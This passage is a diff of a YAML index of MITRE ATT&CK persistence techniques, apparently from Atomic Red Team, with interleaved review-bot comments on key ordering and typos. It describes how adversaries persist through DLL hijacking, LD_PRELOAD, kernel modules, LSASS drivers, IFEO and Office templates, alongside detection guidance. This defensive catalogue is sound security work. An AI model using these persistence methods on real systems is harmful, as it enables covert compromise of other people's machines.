Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
@@ -10871,13 +11085,15 @@ persistence:
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
- x_mitre_data_sources:
- - Environment variable
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - DLL monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1062:
technique:
@@ -10918,21 +11134,21 @@ persistence:
phase_name: persistence
modified: '2020-03-30T13:44:04.712Z'
created: '2017-05-31T21:30:50.958Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - System calls
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: 'Type-1 hypervisors may be detected by performing timing
analysis. Hypervisors emulate certain CPU instructions that would normally
be executed by the hardware. If an instruction takes orders of magnitude longer
to execute than normal on a system that should not contain a hypervisor, one
may be present. (Citation: virtualization.info 2006)'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_data_sources:
+ - System calls
+ x_mitre_version: '2.0'
atomic_tests: []
T1546.012:
technique:
@@ -10998,25 +11214,25 @@ persistence:
phase_name: persistence
modified: '2020-03-24T19:39:50.839Z'
created: '2020-01-24T15:05:58.384Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
+
+ Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
x_mitre_data_sources:
- API monitoring
- Windows event logs
- Windows Registry
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
-
- Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ x_mitre_platforms:
+ - Windows
identifier: T1546.012
atomic_tests:
- name: IFEO Add Debugger
@@ -11118,21 +11334,21 @@ persistence:
phase_name: persistence
modified: '2020-03-25T22:47:34.137Z'
created: '2019-09-04T12:04:03.552Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Asset management
+ x_mitre_detection: Monitor interactions with images and containers by users
+ to identify ones that are added or modified anomalously.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
x_mitre_platforms:
- GCP
- Azure
- AWS
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- x_mitre_detection: Monitor interactions with images and containers by users
- to identify ones that are added or modified anomalously.
- x_mitre_data_sources:
- - File monitoring
- - Asset management
- x_mitre_is_subtechnique: false
atomic_tests: []
T1547.006:
technique:
@@ -11180,6 +11396,11 @@ persistence:
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
source_name: Securelist Ventir
+ - source_name: Trend Micro Skidmap
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
+ description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
+ Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
+ Retrieved June 4, 2020.
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
@@ -11199,7 +11420,7 @@ persistence:
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.
- Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)
+ Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
type: attack-pattern
kill_chain_phases:
@@ -11207,27 +11428,28 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T16:14:29.149Z'
+ modified: '2020-06-30T21:23:15.188Z'
created: '2020-01-24T17:42:23.339Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_contributors:
- - Jeremy Galloway
- - Red Canary
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: |-
Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.
- Adversaries will likely run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
- x_mitre_permissions_required:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Jeremy Galloway
+ - Red Canary
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1547.006
atomic_tests:
- name: Linux - Load Kernel Module via insmod
@@ -11304,29 +11526,31 @@ persistence:
phase_name: persistence
modified: '2020-03-24T16:50:36.235Z'
created: '2020-01-24T14:21:52.750Z'
- x_mitre_platforms:
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor processes for those that may be used to modify binary
+ headers. Monitor file systems for changes to application binaries and invalid
+ checksums/signatures. Changes to binaries that do not line up with application
+ updates or patches are also extremely suspicious.
x_mitre_data_sources:
- File monitoring
- Process command-line parameters
- Process monitoring
- Binary file metadata
- x_mitre_detection: Monitor processes for those that may be used to modify binary
- headers. Monitor file systems for changes to application binaries and invalid
- checksums/signatures. Changes to binaries that do not line up with application
- updates or patches are also extremely suspicious.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - macOS
atomic_tests: []
T1574.006:
technique:
id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+ Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
- LD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+ Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+
+ LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
name: LD_PRELOAD
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
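Review bot: The rewritten description on the new side still carries the typo `Libraries specified by LD_PRELOAD with be loaded` (should read `will be loaded`), inherited from the removed sentence above it; since this file looks generated from the upstream ATT&CK bundle, the fix belongs in the generator's source data or it will be reintroduced on the next sync. Apart from that paragraph and the new Man LD.SO wording, this hunk and the later ones for T1543.001, T1543.004, T1053.004, T1136.001, T1037.002, T1037.001, T1546.007 and the T1137.* sub-techniques only move `x_mitre_*` keys around, which suggests the exporter emits mapping keys in upstream insertion order. Sorting keys when dumping (for example `sort_keys=True` in PyYAML's dump, if that is the emitter in use) would keep future syncs down to the content changes a reviewer actually needs to read.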
@@ -11335,6 +11559,10 @@ persistence:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - source_name: Man LD.SO
+ url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
+ description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
+ June 15, 2020.
- source_name: TLDP Shared Libraries
url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved
@@ -11360,20 +11588,20 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T18:46:55.796Z'
+ modified: '2020-06-15T21:59:25.358Z'
created: '2020-03-13T20:09:59.569Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Monitor for changes to environment variables, as well as the commands to implement these changes.
-
- Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_platforms:
+ - Linux
x_mitre_data_sources:
- Process monitoring
- File monitoring
- Environment variable
- x_mitre_platforms:
- - Linux
+ x_mitre_detection: |-
+ Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.
+
+ Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -11439,6 +11667,23 @@ persistence:
name: bash
T1547.008:
technique:
+ created: '2020-01-24T18:38:55.801Z'
+ modified: '2020-03-25T16:52:26.567Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4
+ description: |-
+ Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
+
+ Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
+ name: LSASS Driver
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1547.008
@@ -11459,23 +11704,6 @@ persistence:
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: LSASS Driver
- description: |-
- Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
-
- Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T16:52:26.567Z'
- created: '2020-01-24T18:38:55.801Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -11566,20 +11794,20 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T22:11:45.513Z'
created: '2020-01-17T16:10:58.592Z'
- x_mitre_platforms:
- - macOS
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: Monitor Launch Agent creation through additional plist files
and utilities such as Objective-See’s KnockKnock application. Launch Agents
also require files on disk for persistence which can also be monitored via
other file monitoring applications.
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_platforms:
+ - macOS
identifier: T1543.001
atomic_tests:
- name: Launch Agent
@@ -11669,18 +11897,18 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T22:27:49.609Z'
created: '2020-01-17T19:23:15.227Z'
- x_mitre_platforms:
- - macOS
- x_mitre_detection: 'Monitor for launch daemon creation or modification through
- plist files and utilities such as Objective-See''s KnockKnock application. '
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Monitor for launch daemon creation or modification through
+ plist files and utilities such as Objective-See''s KnockKnock application. '
+ x_mitre_platforms:
+ - macOS
identifier: T1543.004
atomic_tests:
- name: Launch Daemon
@@ -11748,12 +11976,11 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-23T22:41:14.739Z'
created: '2019-12-03T14:15:27.452Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -11764,11 +11991,12 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - root
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ - Process monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1053.004
atomic_tests:
- name: Event Monitor Daemon Persistence
@@ -11824,25 +12052,25 @@ persistence:
phase_name: persistence
modified: '2020-03-23T18:04:20.780Z'
created: '2020-01-28T13:50:22.506Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Authentication logs
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Monitor for processes and command-line parameters associated
with local account creation, such as net user /add or useradd.
Collect data on account creation within a network. Event ID 4720 is generated
when a user account is created on a Windows system. (Citation: Microsoft User
Creation Event) Perform regular audits of local system accounts to detect
suspicious accounts that may have been created by an adversary.'
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Authentication logs
+ - Windows event logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1136.001
atomic_tests:
- name: Create a user account on a Linux system
@@ -12023,21 +12251,21 @@ persistence:
phase_name: initial-access
modified: '2020-03-23T21:48:41.083Z'
created: '2020-03-13T20:26:46.695Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Perform regular audits of local system accounts to detect
accounts that may have been created by an adversary for persistence. Look
for suspicious account behavior, such as accounts logged in at odd times or
outside of business hours.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1037.002:
technique:
@@ -12078,18 +12306,18 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-27T16:49:15.786Z'
created: '2020-01-10T16:01:15.995Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
@@ -12143,17 +12371,17 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T23:45:03.153Z'
created: '2020-01-10T03:43:37.211Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Windows Registry
x_mitre_detection: |-
Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.
- x_mitre_data_sources:
- - Process monitoring
- - Windows Registry
- x_mitre_platforms:
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.001
atomic_tests:
- name: Logon Scripts
@@ -12215,25 +12443,25 @@ persistence:
phase_name: persistence
modified: '2020-03-24T18:28:07.793Z'
created: '2020-01-24T14:26:51.207Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
in most environments. Monitor process executions and investigate any child
processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh
registry key for any new or suspicious entries that do not correlate with
known system files or benign software. (Citation: Demaske Netsh Persistence)'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ - DLL monitoring
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1546.007
atomic_tests:
- name: Netsh Helper DLL Registration
@@ -12287,28 +12515,29 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T23:45:25.625Z'
created: '2020-01-10T18:01:03.666Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1137:
technique:
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ created: '2017-12-14T16:46:06.044Z'
+ modified: '2020-06-25T17:48:09.417Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1137
@@ -12339,14 +12568,13 @@ persistence:
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-03-26T17:36:16.211Z'
- created: '2017-12-14T16:46:06.044Z'
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ name: Office Application Startup
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
x_mitre_is_subtechnique: false
x_mitre_version: '1.2'
x_mitre_contributors:
@@ -12426,8 +12654,8 @@ persistence:
file created by default, but one can be added that will automatically be loaded.(Citation:
enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates
may also be stored and pulled from remote locations.(Citation: GlobalDotName
- Jun 2019) \n\nWord Normal.dotm location:C:\\Users\\\\(username)\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel
- Personal.xlsb location:C:\\Users\\\\(username)\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries
+ Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel
+ Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries
may also change the location of the base template to point to their own by
hijacking the application's search order, e.g. Word 2016 will first look for
Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\,
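Review bot: The new placeholder `<username>` in the Normal.dotm and PERSONAL.XLSB paths will be parsed as an HTML or Markdown tag if this description is ever rendered, so any consumer that renders descriptions should escape it (`&lt;username&gt;`) or wrap the path in a code span; the removed `\\(username)` form did not have that problem. The hunk header's `+8` only balances if the breaks after `location:` are display artifacts of the double-quoted scalar's folded continuation rather than real line breaks, which is worth confirming against the file before merging.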
@@ -12444,16 +12672,13 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-25T23:49:21.679Z'
+ modified: '2020-06-25T17:48:08.916Z'
created: '2019-11-07T20:29:17.788Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - Process command-line parameters
- - File monitoring
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -12463,11 +12688,14 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process monitoring
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1137.002:
technique:
@@ -12503,9 +12731,17 @@ persistence:
phase_name: persistence
modified: '2020-03-20T15:27:51.559Z'
created: '2019-11-07T19:44:04.475Z'
- x_mitre_platforms:
- - Windows
- - Office 365
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_system_requirements:
+ - Office 2007, 2010, 2013, and 2016
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: |-
